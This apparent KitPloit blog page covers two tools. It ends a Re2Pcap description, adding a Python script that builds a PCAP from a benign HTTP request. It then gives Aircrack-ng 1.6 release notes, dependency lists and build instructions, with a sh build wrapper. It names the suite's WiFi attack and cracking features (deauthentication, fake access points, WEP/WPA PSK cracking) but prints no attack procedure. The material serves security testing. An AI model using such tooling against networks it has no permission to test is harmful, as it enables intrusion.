<br />
<span style="font-size: large;"><b>Re2Pcap Workflow</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-s1Zrrns-i1Q/XjorToXojdI/AAAAAAAARnc/heCjS3arKWQJ6JlKQI5Y2Rf1bbZTay6dgCNcBGAsYHQ/s1600/Re2Pcap_6_workflow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="899" data-original-width="1600" height="358" src="https://1.bp.blogspot.com/-s1Zrrns-i1Q/XjorToXojdI/AAAAAAAARnc/heCjS3arKWQJ6JlKQI5Y2Rf1bbZTay6dgCNcBGAsYHQ/s640/Re2Pcap_6_workflow.png" width="640" /></a></div>
<br />
As shown in the image above, Re2Pcap is an Alpine Linux based Python 3 application with a Flask based web interface.<br />
Re2Pcap parses the input data as a raw HTTP request or response and actually performs the client/server interaction while capturing packets. After the interaction, Re2Pcap presents the captured packets as a PCAP file<br />
<br />
<span style="font-size: large;"><b>Recommendations</b></span><br />
<ul>
<li>Please use Linux as your host operating system, as Re2Pcap is well tested on Linux</li>
<li>If creating a PCAP for <code>Host: somedomain:5000</code>, i.e. port 5000, please change the Flask application to run on another port by modifying the <code>app.run</code> call in Re2Pcap.py; otherwise the PCAP will contain the Flask application's response</li>
</ul>
<br />
<span style="font-size: large;"><b>Limitations</b></span><br />
<ul>
<li> If the raw HTTP request is without an <code>Accept-Encoding:</code> header, <code>Accept-Encoding: identity</code> is added to the request<br />
<ul>
<li>There is a known <a href="https://github.com/psf/requests/issues/2234" rel="nofollow" target="_blank" title="issue">issue</a> for it in Python requests. The following is the closing note for that issue</li>
</ul>
<blockquote>
That's really fairly terrible. Accept-Encoding: identity is always valid, the RFCs say so. It should be utterly harmless to send it along. Otherwise, removing this requires us to replace httplib. That's a substantial bit of work. =(</blockquote>
</li>
<li> The following are the source and destination IPs in PCAPs from Re2Pcap<br />
<ul>
<li>Source IP: 10.10.10.1</li>
<li>Destination IP: 172.17.0.2 or (Re2Pcap Container's IP Address)</li>
</ul>
Please use the <code>tcprewrite -D</code> option to modify the destination IP to something else as per your need. You may also use <code>tcpprep</code> and <code>tcprewrite</code> to set other IPs as endpoints. Due to inconsistent results of <code>tcprewrite</code>, I used an alternative way to set different SRC/DST IPs<br />
</li>
<li> Specifying <code>HTTP/1.1 302 FOUND</code> as the response will generate a PCAP with the maximum possible number of retries to reach the resource specified in the <code>Location:</code> header. Please export the first HTTP stream using <a href="https://www.kitploit.com/search/label/Wireshark" target="_blank" title="wireshark">Wireshark</a> for testing if you do not want the additional noise of the other streams<br />
</li>
</ul>
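The parsing and packet-encoding steps described in the Workflow and Limitations sections above, as an added example that is not Re2Pcap's own code: Re2Pcap replays the request through a real client and server inside the container and captures it with tcpdump, whereas this script synthesises the Ethernet/IPv4/TCP frames directly and writes a classic libpcap file. It keeps the two behaviours the post documents (a missing <code>Accept-Encoding</code> header becomes <code>Accept-Encoding: identity</code>, and the endpoints are 10.10.10.1 and 172.17.0.2) and adds a Content-Length check. The MAC addresses, client port, sequence numbers, timestamps and the sample request body are constructed for the example.

```python
import socket
import struct

# Endpoints documented in the post's Limitations section (pcap src/dst).
CLIENT_IP, SERVER_IP = "10.10.10.1", "172.17.0.2"
# Constructed values: locally administered MACs, an ephemeral client port.
CLIENT_MAC, SERVER_MAC = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
CLIENT_PORT, SERVER_PORT = 40000, 80
SYN, PSH, ACK = 0x02, 0x08, 0x10

# Constructed sample input in the post's raw-request format: Accept-Encoding
# is deliberately left out, and the body is a benign form field.
SAMPLE_REQUEST = (
    "POST /admin/tools/iplogging.cgi HTTP/1.1\n"
    "Host: 192.168.13.31:80\n"
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n"
    "Content-Length: 18\n"
    "Connection: close\n"
    "\n"
    "stateRequest=start"
)

def parse_raw_request(raw):
    """Split a raw HTTP request into (request_line, [(name, value)], body)."""
    # The post notes Re2Pcap's requests backend sends Accept-Encoding: identity
    # when the header is absent; we mirror that so the synthetic packet matches.
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    headers = []
    for line in lines[1:]:
        if line.strip():
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    if not any(n.lower() == "accept-encoding" for n, _ in headers):
        headers.append(("Accept-Encoding", "identity"))
    # A body shorter than Content-Length makes a real server wait for more data.
    declared = next((v for n, v in headers if n.lower() == "content-length"), None)
    if declared is not None and int(declared) != len(body.encode()):
        raise ValueError(f"Content-Length {declared} != body length {len(body.encode())}")
    return lines[0], headers, body

def serialize_request(request_line, headers, body):
    """Re-emit the request as it goes on the wire, with CRLF line endings."""
    head = "\r\n".join([request_line] + [f"{n}: {v}" for n, v in headers])
    return (head + "\r\n\r\n" + body).encode()

def checksum(data):
    """RFC 1071 one's-complement checksum shared by IPv4 and TCP."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def tcp_ip_frame(src_ip, dst_ip, sport, dport, seq, ack, flags, payload=b""):
    """Build one Ethernet/IPv4/TCP frame with correct IP and TCP checksums."""
    tcp_len = 20 + len(payload)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)
    pseudo = socket.inet_aton(src_ip) + socket.inet_aton(dst_ip) + struct.pack("!BBH", 0, 6, tcp_len)
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + payload)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 1, 0x4000, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    dst_mac, src_mac = (SERVER_MAC, CLIENT_MAC) if src_ip == CLIENT_IP else (CLIENT_MAC, SERVER_MAC)
    return dst_mac + src_mac + b"\x08\x00" + ip + tcp + payload

def checksums_ok(frame):
    """True when both the IPv4 and the TCP checksum of a frame verify to zero."""
    ip, seg = frame[14:34], frame[34:]
    pseudo = ip[12:20] + struct.pack("!BBH", 0, 6, len(seg))
    return checksum(ip) == 0 and checksum(pseudo + seg) == 0

def write_pcap(frames, path=None):
    """Encode frames as a classic libpcap file (link type 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        # constructed timestamps one second apart, so the stream orders cleanly
        out += struct.pack("<IIII", 1_600_000_000 + i, 0, len(frame), len(frame)) + frame
    if path:
        with open(path, "wb") as fh:
            fh.write(out)
    return out

def request_to_pcap(raw_request, path=None):
    """Handshake, the request segment and the server's ACK, as pcap bytes."""
    payload = serialize_request(*parse_raw_request(raw_request))
    cseq, sseq = 1000, 5000  # constructed initial sequence numbers
    c2s = (CLIENT_IP, SERVER_IP, CLIENT_PORT, SERVER_PORT)
    s2c = (SERVER_IP, CLIENT_IP, SERVER_PORT, CLIENT_PORT)
    frames = [
        tcp_ip_frame(*c2s, cseq, 0, SYN),
        tcp_ip_frame(*s2c, sseq, cseq + 1, SYN | ACK),
        tcp_ip_frame(*c2s, cseq + 1, sseq + 1, ACK),
        tcp_ip_frame(*c2s, cseq + 1, sseq + 1, PSH | ACK, payload),
        tcp_ip_frame(*s2c, sseq + 1, cseq + 1 + len(payload), ACK),
    ]
    return write_pcap(frames, path)
```

Calling <code>request_to_pcap(SAMPLE_REQUEST, "request.pcap")</code> writes a file that Wireshark opens as a single HTTP stream with valid checksums; from there the same <code>tcprewrite</code> steps described above apply if different endpoints are needed.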
<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Cisco-Talos/Re2Pcap" rel="nofollow" target="_blank" title="Download Re2Pcap">Download Re2Pcap</a></span></b></div>
<br />
<span style="font-size: x-large;"><b>Aircrack-ng 1.6 - Complete Suite Of Tools To Assess WiFi Network Security</b></span> (2020-01-26)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-TwcnabqVerc/Xi0KY7J-F2I/AAAAAAAARfk/4blgK4BuWOAyjyJ517amBWGHNw5S8BXEwCNcBGAsYHQ/s1600/Aircrack-ng%2B1.6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="645" data-original-width="645" src="https://1.bp.blogspot.com/-TwcnabqVerc/Xi0KY7J-F2I/AAAAAAAARfk/4blgK4BuWOAyjyJ517amBWGHNw5S8BXEwCNcBGAsYHQ/s1600/Aircrack-ng%2B1.6.png" /></a></div>
<br />
Aircrack-ng is a complete suite of tools to assess WiFi network security.<br />
It focuses on different areas of WiFi security:<br />
<ul>
<li>Monitoring: Packet capture and export of data to text files for further processing by third party tools.</li>
<li>Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.</li>
<li>Testing: Checking WiFi cards and driver capabilities (capture and injection).</li>
<li>Cracking: WEP and WPA PSK (WPA 1 and 2).</li>
</ul>
All tools are <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a>, which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily on Linux but also on Windows, OS X, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.<br />
<br />
It's been more than a year since the <a href="https://aircrack-ng.blogspot.com/2018/12/aircrack-ng-152.html">last release</a>, and this <a href="https://aircrack-ng.org/">one</a> brings a ton of improvements.<br />
The most noticeable change is the rate display in Airodump-ng.
Previously, it went up to 54Mbit. Now, it takes into account the
complexity of 802.11n/ac and calculates the maximum rate that can be
achieved on the AP. Expect 802.11ax rates in the next release. We
brought basic UTF-8 support for ESSID and if you ever come across <a href="https://en.wikipedia.org/wiki/WPA3#WPA3" target="_blank">WPA3</a> or <a href="https://en.wikipedia.org/wiki/Opportunistic_Wireless_Encryption" target="_blank">OWE</a>,
this will be displayed correctly as well. Airodump-ng has had the
ability to read PCAP files for quite some time, which can be handy to
generate one of the <a href="https://aircrack-ng.org/doku.php?id=airodump-ng#text_files_containing_access_points_and_clients" target="_blank">CSV/netxml</a>
or other output formats available. However, signal levels were not
displayed; this has now been fixed. A new option has been added to read
the files in realtime, instead of reading all at once.<br />
<br />
<b>Huge</b> improvements have been made under the hood as well. Code has been cleaned up, deduplicated (<a href="https://github.com/aircrack-ng/aircrack-ng/pull/2010" target="_blank">Pull Request 2010</a>) and reorganized (<a href="https://github.com/aircrack-ng/aircrack-ng/pull/2032" target="_blank">Pull Request 2032</a>), which led to a lot of fixes.<br />
<br />
This reorganization also updated the build system, which now requires
automake 1.14+. This was a problem on CentOS 7, but we provide a script
to install these requirements from source to solve the issue; although
automake 1.14 (and other dependencies) were released 6+ years ago,
CentOS is the only distribution that doesn't have it, and it was decided
that providing a script to install the requirements was a small price to
pay to improve and simplify the build system.<br />
<br />
Other tools received fixes as well:<br />
<ul>
<li>Along with a few fixes, Airmon-ng now handles more network managers, and persistent ones; no need to run <code>airmon-ng check kill</code> a few times for the network managers that keep restarting.</li>
<li>Airdecap-ng can now decrypt both sides of the conversation when <a href="https://en.wikipedia.org/wiki/Wireless_Distribution_System" target="_blank">WDS</a> is in use.</li>
<li>As usual, we updated <a href="https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe" target="_blank">WPE patches</a> for freeradius and HostAPd.</li>
<li>Python 2 is dead as of <a href="https://legacy.python.org/dev/peps/pep-0373/" target="_blank">January 1st</a>, and now all our scripts support Python 3. If you are still running Python 2, don't worry, they are still backward compatible.</li>
<li>Aircrack-ng contains fixes for a few crashes and other regressions, as
well as improved CPU detection in some cases (-u option). </li>
</ul>
<br />
We have been working on our infrastructure and have a <a href="https://en.wikipedia.org/wiki/Buildbot">buildbot</a> server with quite a few systems. If you head up to our <a href="https://buildbot.aircrack-ng.org/" target="_blank">buildbot landing page</a>,
you can see the extent of the build system: 14 systems to test build on
top of AppVeyor, TravisCI, and Coverity Scan, plus one to automatically
package it and <a href="https://packagecloud.io/aircrack-ng" target="_blank">upload packages to packagecloud.io</a>.
It gets triggered every time we push code to our GitHub repository and
you can see the details of each build for each commit on GitHub. We have
an earlier blog post where you can find some <a href="https://aircrack-ng.blogspot.com/2018/11/continuous-integrationcontious-delivery.html" target="_blank">details of our CI/CD</a>.<br />
We are currently working on bringing Mac infrastructure as well.<br />
<br />
We keep working on our automated tests, and a few have been added; this release also brings <a href="https://en.wikipedia.org/wiki/Integration_testing">integration tests</a> (16 for now) to automatically test different features of airodump-ng, aireplay-ng, airbase-ng and others.<br />
<br />
In case you find security issues in Aircrack-ng or our domains, we
recently added a security policy to explain how to report them. It is on
<a href="https://github.com/aircrack-ng/aircrack-ng/security/policy" target="_blank">GitHub</a>, on our <a href="https://aircrack-ng.org/security.html">website</a>, as well as <a href="https://aircrack-ng.org/.well-known/security.txt">security.txt</a>.<br />
<br />
And finally, what you've been waiting for, the full changelog:<br />
<ul>
<li>Aircrack-ng: Added support for MidnightBSD
</li>
<li>Aircrack-ng: Fixed ARM processors display with -u
</li>
<li>Aircrack-ng: Fixed AVX-512F support
</li>
<li>Aircrack-ng: Fixed cracking speed calculation
</li>
<li>Aircrack-ng: Fixed cracking WEP beyond 10k IVS
</li>
<li>Aircrack-ng: Fixed creating new session and added test case
</li>
<li>Aircrack-ng: Fixed encryption display in some cases when prompting for network to crack
</li>
<li>Aircrack-ng: Fixed exiting Aircrack-ng in some cases
</li>
<li>Aircrack-ng: Fixed logical and physical processor count detection
</li>
<li>Aircrack-ng: Fixed PMKID length check
</li>
<li>Aircrack-ng: Various fixes and improvements to WPA cracking engine and its performance
</li>
<li>Airdecap-ng: Decrypt both directions when WDS is in use
</li>
<li>Airdecap-ng: Fixed decrypting WPA PCAP when BSSID changes
</li>
<li>Airgraph-ng: Added support for WPA3
</li>
<li>Airgraph-ng: Switch to argparse
</li>
<li>Airmon-ng: Added detection for wicd, Intel Wireless Daemon (iwd), net_applet
</li>
<li>Airmon-ng: Handle case when avahi keeps getting restarted
</li>
<li>Airmon-ng: Indicates when interface doesn't exist
</li>
<li>Airodump-ng: Added autocolorization interactive key
</li>
<li>Airodump-ng: Added option to read PCAP in realtime (-T)
</li>
<li>Airodump-ng: Added PMKID detection
</li>
<li>Airodump-ng: Added support for GMAC
</li>
<li>Airodump-ng: Added support for WPA3 and OWE (Enhanced Open)
</li>
<li>Airodump-ng: Basic UTF-8 support
</li>
<li>Airodump-ng: Checked management frames are complete before processing IE to avoid switch from WEP to WPA
</li>
<li>Airodump-ng: Display signal when reading from PCAP
</li>
<li>Airodump-ng: Fixed netxml output with hidden SSID
</li>
<li>Airodump-ng: Improved rates calculation for 802.11n/ac
</li>
<li>Airtun-ng: Fixed using -p with -e
</li>
<li>Autoconf: Fixed order of ssl and crypto libraries
</li>
<li>dcrack: Fixed client reporting benchmark
</li>
<li>dcrack: Now handles chunked encoding when communicating (default in Python3)
</li>
<li>Freeradius-WPE: Updated patch for v3.0.20
</li>
<li>General: Added NetBSD endianness support
</li>
<li>General: Added python3 support to scripts
</li>
<li>General: Added script to update autotools on CentOS 7
</li>
<li>General: Added security policy to report security issues
</li>
<li>General: Reorganizing filesystem layout (See PR 2032), and switch to automake 1.14+
</li>
<li>General: Convert to non-recursive make (part of PR 2032)
</li>
<li>General: Deduplicating functions and code cleanups
</li>
<li>General: Fixed packaging on cygwin due to openssl library name change
</li>
<li>General: Fixed SPARC build on Solaris 11
</li>
<li>General: Removed coveralls.io
</li>
<li>General: Updated dependencies in README.md/INSTALLING
</li>
<li>General: Use upstream radiotap library, as a sub-tree
</li>
<li>General: various fixes and improvements (code, CI, integration tests, coverity)
</li>
<li>HostAPd-WPE: Updated for v2.9
</li>
<li>Manpages: Fixes and improvements
</li>
<li>Tests: Added Integration tests for aireplay-ng, airodump-ng, aircrack-ng, airbase-ng, and others
</li>
<li>Tests: Added tests for airdecap-ng, aircrack-ng</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Building</b></span><br />
<br />
<span style="font-size: large;"><b>Requirements</b></span><br />
<ul>
<li>Autoconf</li>
<li>Automake</li>
<li>Libtool</li>
<li>shtool</li>
<li>OpenSSL development package or libgcrypt development package.</li>
<li>Airmon-ng (Linux) requires ethtool.</li>
<li>On Windows, Cygwin has to be used, and it also requires the w32api package.</li>
<li>On Windows, if using clang, libiconv and libiconv-devel</li>
<li>Linux: LibNetlink 1 or 3. It can be disabled by passing --disable-libnl to configure.</li>
<li>pkg-config (pkgconf on FreeBSD)</li>
<li>FreeBSD, OpenBSD, NetBSD, Solaris and OS X with macports: gmake</li>
<li>Linux/Cygwin: make and Standard C++ Library development package (Debian: libstdc++-dev)</li>
</ul>
<br />
<span style="font-size: large;"><b>Optional stuff</b></span><br />
<ul>
<li>If you want SSID filtering with regular expressions in airodump-ng (--essid-regex), the pcre development package is required.</li>
<li>If you want to use airolib-ng and '-r' option in aircrack-ng, SQLite development package >= 3.3.17 (3.6.X version or better is recommended)</li>
<li>If you want to use Airpcap, the 'developer' directory from the CD/ISO/SDK is required.</li>
<li>In order to build <code>besside-ng</code>, <code>besside-ng-crawler</code>, <code>easside-ng</code>, <code>tkiptun-ng</code> and <code>wesside-ng</code>, the libpcap development package is required (on Cygwin, use the Airpcap SDK instead; see above)</li>
<li>For best performance on FreeBSD (50-70% more), install gcc5 (or better) via: pkg install gcc9</li>
<li>rfkill</li>
<li>If you want <a href="https://www.kitploit.com/search/label/Airodump-ng" target="_blank" title="Airodump-ng">Airodump-ng</a> to log GPS coordinates, gpsd is needed</li>
<li>For best performance on SMP machines, ensure the hwloc library and headers are installed. It is strongly recommended on high core count systems, it may give a serious speed boost</li>
<li>CMocka for unit testing</li>
<li>For integration testing on Linux only: tcpdump, HostAPd, WPA Supplicant and screen</li>
</ul>
<br />
<span style="font-size: large;"><b>Installing required and optional dependencies</b></span><br />
Below are instructions for installing the basic <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> to build <code>aircrack-ng</code> for a number of operating systems.<br />
<strong>Note</strong>: CMocka, tcpdump, screen, HostAPd and WPA Supplicant should not be dependencies when packaging Aircrack-ng.<br />
<br />
<b>Linux</b><br />
<br />
<b>Debian/Ubuntu</b><br />
<pre><code>sudo apt-get install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils</code></pre>
<br />
<b>Fedora/CentOS/RHEL</b><br />
<pre><code>sudo yum install libtool pkgconfig sqlite-devel autoconf automake openssl-devel libpcap-devel pcre-devel rfkill libnl3-devel gcc gcc-c++ ethtool hwloc-devel libcmocka-devel git make file expect hostapd wpa_supplicant iw usbutils tcpdump screen</code></pre>
<strong>Note</strong>: on CentOS and RedHat, HostAPd requires 'epel' repository to be enabled: sudo yum install epel-release<br />
<br />
<b>openSUSE</b><br />
<pre><code>sudo zypper install autoconf automake libtool pkg-config libnl3-devel libopenssl-1_1-devel zlib-devel libpcap-devel sqlite3-devel pcre-devel hwloc-devel libcmocka-devel hostapd wpa_supplicant tcpdump screen iw gcc-c++ gcc</code></pre>
<br />
<b>Mageia</b><br />
<pre><code>sudo urpmi autoconf automake libtool pkgconfig libnl3-devel libopenssl-devel zlib-devel libpcap-devel sqlite3-devel pcre-devel hwloc-devel libcmocka-devel hostapd wpa_supplicant tcpdump screen iw gcc-c++ gcc make</code></pre>
<br />
<b>Alpine</b><br />
<pre><code>sudo apk add gcc g++ make autoconf automake libtool libnl3-dev openssl-dev ethtool libpcap-dev cmocka-dev hostapd wpa_supplicant tcpdump screen iw pkgconf util-linux sqlite-dev pcre-dev linux-headers zlib-dev</code></pre>
<br />
<b>BSD</b><br />
<br />
<b>FreeBSD</b><br />
<pre><code>pkg install pkgconf shtool libtool gcc9 automake autoconf pcre sqlite3 openssl gmake hwloc cmocka</code></pre>
<br />
<b>DragonflyBSD</b><br />
<pre><code>pkg install pkgconf shtool libtool gcc8 automake autoconf pcre sqlite3 libgcrypt gmake cmocka</code></pre>
<br />
<b>OpenBSD</b><br />
<pre><code>pkg_add pkgconf shtool libtool gcc automake autoconf pcre sqlite3 openssl gmake cmocka</code></pre>
<br />
<b>OSX</b><br />
Xcode, the Xcode command line tools and Homebrew are required.<br />
<pre><code>brew install autoconf automake libtool openssl shtool pkg-config hwloc pcre sqlite3 libpcap cmocka</code></pre>
<br />
<b>Windows</b><br />
<br />
<b>Cygwin</b><br />
Cygwin requires the full path to the <code>setup.exe</code> utility, in order to automate the installation of the necessary packages. In addition, it requires the location of your installation, a path to the cached packages download location, and a mirror URL.<br />
An example of automatically installing all the dependencies is as follows:<br />
<pre><code>c:\cygwin\setup-x86.exe -qnNdO -R C:/cygwin -s http://cygwin.mirror.constant.com -l C:/cygwin/var/cache/setup -P autoconf -P automake -P bison -P gcc-core -P gcc-g++ -P mingw-runtime -P mingw-binutils -P mingw-gcc-core -P mingw-gcc-g++ -P mingw-pthreads -P mingw-w32api -P libtool -P make -P python -P gettext-devel -P gettext -P intltool -P libiconv -P pkg-config -P git -P wget -P curl -P libpcre-devel -P libssl-devel -P libsqlite3-devel</code></pre>
<br />
<b>MSYS2</b><br />
<pre><code>pacman -Sy autoconf automake-wrapper libtool msys2-w32api-headers msys2-w32api-runtime gcc pkg-config git python openssl-devel openssl libopenssl msys2-runtime-devel gcc binutils make pcre-devel libsqlite-devel</code></pre>
<br />
<span style="font-size: large;"><b>Compiling</b></span><br />
To build <code>aircrack-ng</code>, the Autotools build system is utilized. Autotools replaces the older method of compilation.<br />
<strong>NOTE</strong>: If utilizing a developer version, e.g. one checked out from source control, you will need to run a pre-<code>configure</code> script. The script to use is one of the following: <code>autoreconf -i</code> or <code>env NOCONFIGURE=1 ./autogen.sh</code>.<br />
First, <code>./configure</code> the project for building with the appropriate options specified for your environment:<br />
<pre><code>./configure <options></code></pre>
<strong>TIP</strong>: If the above fails, please see above about developer source control versions.<br />
Next, compile the project (respecting if <code>make</code> or <code>gmake</code> is needed):<br />
<ul>
<li> Compilation:<br />
<code>make</code><br />
</li>
<li> Compilation on *BSD or Solaris:<br />
<code>gmake</code><br />
</li>
</ul>
Finally, the additional targets listed below may be of use in your environment:<br />
<ul>
<li> Execute all unit testing:<br />
<code>make check</code><br />
</li>
<li> Execute all integration testing (requires root):<br />
<code>make integration</code><br />
</li>
<li> Installing:<br />
<code>make install</code><br />
</li>
<li> Uninstall:<br />
<code>make uninstall</code><br />
</li>
</ul>
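The compile sequence just described (bootstrap a developer checkout, <code>./configure</code>, then <code>make</code> or <code>gmake</code>, then <code>make check</code>), wrapped in a small POSIX sh script as an added example; this is not part of the Aircrack-ng project, and the helper names are our own. The only <code>./configure</code> switches it knows are ones documented in this post (<code>--with-experimental</code>, <code>--enable-static --disable-shared</code>, <code>--disable-libnl</code>); the real build only runs when a source directory is passed on the command line.

```shell
#!/bin/sh
# Added example: wrapper for the documented aircrack-ng build steps.
# Not part of Aircrack-ng; pick_make/needs_bootstrap/configure_flags are ours.
set -eu

# The post says *BSD and Solaris need GNU make installed as "gmake".
pick_make() {
    case "$1" in
        FreeBSD|OpenBSD|NetBSD|DragonFly|SunOS) echo gmake ;;
        *) echo make ;;
    esac
}

# A developer checkout has no ./configure yet and must be bootstrapped first.
needs_bootstrap() {
    [ ! -x "$1/configure" ]
}

# Either bootstrap command from the post's NOTE; autogen.sh is preferred when present.
bootstrap() {
    if [ -x "$1/autogen.sh" ]; then
        (cd "$1" && env NOCONFIGURE=1 ./autogen.sh)
    else
        (cd "$1" && autoreconf -i)
    fi
}

# Translate short option names into the documented ./configure flags.
# "static" emits both flags because --with-static-simd and a static binary
# require --enable-static --disable-shared together.
configure_flags() {
    flags=""
    for opt in "$@"; do
        case "$opt" in
            static)       flags="$flags --enable-static --disable-shared" ;;
            experimental) flags="$flags --with-experimental" ;;
            nolibnl)      flags="$flags --disable-libnl" ;;
            *) echo "unknown option: $opt" >&2; return 1 ;;
        esac
    done
    echo "${flags# }"
}

# build_aircrack SRC_DIR [static] [experimental] [nolibnl]
build_aircrack() {
    src="$1"; shift
    make_cmd=$(pick_make "$(uname -s)")
    if needs_bootstrap "$src"; then bootstrap "$src"; fi
    # shellcheck disable=SC2046  # word-splitting of the flag list is intended
    (cd "$src" && ./configure $(configure_flags "$@") && "$make_cmd" && "$make_cmd" check)
}

# Only build when a source directory is given: sh build.sh /path/to/aircrack-ng static
if [ "$#" -ge 1 ]; then
    build_aircrack "$@"
fi
```

<code>make integration</code> is left out on purpose: the post notes it requires root, so it belongs in a separate, deliberately privileged step rather than in the default build.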
<br />
<b><code>./configure</code> flags</b><br />
When configuring, the following flags can be used and combined to adjust the suite to your choosing:<br />
<ul>
<li> <strong>with-airpcap=DIR</strong>: needed to support Airpcap devices on Windows (Cygwin or MSYS2 only). Replace DIR with the absolute path to the root of the extracted source code from the Airpcap CD or the SDK downloaded online. Required on Windows to build <code>besside-ng</code>, <code>besside-ng-crawler</code>, <code>easside-ng</code>, <code>tkiptun-ng</code> and <code>wesside-ng</code> when building experimental tools. The developer pack (compatible with versions 4.1.1 and 4.1.3) can be downloaded at <a href="https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html" rel="nofollow" target="_blank" title="https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html">https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html</a><br />
</li>
<li> <strong>with-experimental</strong>: needed to compile <code>tkiptun-ng</code>, <code>easside-ng</code>, <code>buddy-ng</code>, <code>buddy-ng-crawler</code>, <code>airventriloquist</code> and <code>wesside-ng</code>. libpcap development package is also required to compile most of the tools. If not present, not all experimental tools will be built. On Cygwin, libpcap is not present and the Airpcap SDK replaces it. See --with-airpcap option above.<br />
</li>
<li> <strong>with-ext-scripts</strong>: needed to build <code>airoscript-ng</code>, <code>versuck-ng</code>, <code>airgraph-ng</code> and <code>airdrop-ng</code>. Note: Each script has its own dependencies.<br />
</li>
<li> <strong>with-gcrypt</strong>: Use the libgcrypt crypto library instead of the default OpenSSL, and also use the internal fast SHA-1 implementation (borrowed from Git). Dependency (Debian): libgcrypt20-dev<br />
</li>
<li> <strong>with-duma</strong>: Compile with DUMA support. DUMA is a library to detect buffer overruns and under-runs. Dependencies (debian): duma<br />
</li>
<li> <strong>disable-libnl</strong>: Set-up the project to be compiled without libnl (1 or 3). Linux option only.<br />
</li>
<li> <strong>without-opt</strong>: Do not enable stack protector (on GCC 4.9 and above).<br />
</li>
<li> <strong>enable-shared</strong>: Make OSdep a shared library.<br />
</li>
<li> <strong>disable-shared</strong>: When combined with <strong>enable-static</strong>, it will statically compile Aircrack-ng.<br />
</li>
<li> <strong>with-avx512</strong>: On x86, add support for AVX512 instructions in aircrack-ng. Only use it when the current CPU supports AVX512.<br />
</li>
<li> <strong>with-static-simd=</strong>: Compile a single optimization into the aircrack-ng binary. Useful when compiling statically and/or for space-constrained devices. Valid SIMD options: x86-sse2, x86-avx, x86-avx2, x86-avx512, ppc-altivec, ppc-power8, arm-neon, arm-asimd. Must be used with --enable-static --disable-shared. When using those 2 options, the default is to compile the generic optimization into the binary; --with-static-simd merely allows choosing another one.<br />
</li>
</ul>
<br />
<b>Examples:</b><br />
<ul>
<li> Configuring and compiling:<br />
<pre><code>./configure --with-experimental
make</code></pre>
</li>
<li> Compiling with gcrypt:<br />
<pre><code>./configure --with-gcrypt
make</code></pre>
</li>
<li> Installing:<br />
<code>make install</code><br />
</li>
<li> Installing (strip binaries):<br />
<code>make install-strip</code><br />
</li>
<li> Installing, with external scripts:<br />
<pre><code>./configure --with-experimental --with-ext-scripts
make
make install</code></pre>
</li>
<li> Testing (with sqlite, experimental and pcre)<br />
<pre><code>./configure --with-experimental
make
make check</code></pre>
</li>
<li> Compiling on OS X with macports (and all options):<br />
<pre><code>./configure --with-experimental
gmake</code></pre>
</li>
<li> Compiling on OS X 10.10 with XCode 7.1 and Homebrew:<br />
<pre><code>env CC=gcc-4.9 CXX=g++-4.9 ./configure
make
make check</code></pre>
<em>NOTE</em>: Older XCode ships with a version of LLVM that does not support CPU feature detection, which causes <code>./configure</code> to fail. To work around this older LLVM, a different compiler suite must be used, such as GCC or a newer LLVM from Homebrew.<br />
If you wish to use OpenSSL from Homebrew, you may need to specify the location of its installation. To figure out where OpenSSL lives, run:<br />
<code>brew --prefix openssl</code><br />
Use the output above as the DIR for <code>--with-openssl=DIR</code> in the <code>./configure</code> line:<br />
<pre><code>env CC=gcc-4.9 CXX=g++-4.9 ./configure --with-openssl=DIR
make
make check</code></pre>
</li>
<li> Compiling on FreeBSD with gcc9<br />
<pre><code>env CC=gcc9 CXX=g++9 MAKE=gmake ./configure
gmake</code></pre>
</li>
<li> Compiling on Cygwin with Airpcap (assuming Airpcap devpack is unpacked in <a href="https://www.kitploit.com/search/label/Aircrack-ng" target="_blank" title="Aircrack-ng">Aircrack-ng</a> directory)<br />
<pre><code>cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src
cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-osdep
cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-crypto
cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-util
dlltool -D Airpcap_Devpack/bin/x86/airpcap.dll -d build/airpcap.dll.def -l Airpcap_Devpack/bin/x86/libairpcap.dll.a
autoreconf -i
./configure --with-experimental --with-airpcap=$(pwd)
make</code></pre>
</li>
